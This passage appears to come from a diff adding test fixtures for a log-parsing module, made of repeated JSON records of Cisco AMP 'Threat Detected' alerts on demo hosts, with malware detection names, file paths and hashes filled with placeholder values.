"file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 187917, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251507855228943", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 944000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 189236, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261640", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 821000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 198516, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259028591575130", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 984000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259028591575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 207155, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251439135752194", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 455000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251439135752000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 208474, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258981346934873", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 346000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258981346935000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 210041, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258929807327320", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258929807327000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 211360, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:56.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668623368585250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 753000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668623368585000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 212679, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258878267719767", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258878267720000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 216643, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258826728112214", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 310000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258826728112000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 217962, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251202912550913", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 262000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251202912551000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\Windows\\System32\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 219281, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258706469027925", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 292000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258706469028000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 220867, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258680699224148", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258680699224000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 222186, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:56.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668365670547487", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 428000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668365670547000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 223505, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668361375580188", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 616000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668361375580000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 227473, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258629159616595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 649000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258629159617000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 228792, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:40.000Z", + "cisco.amp.computer.active": 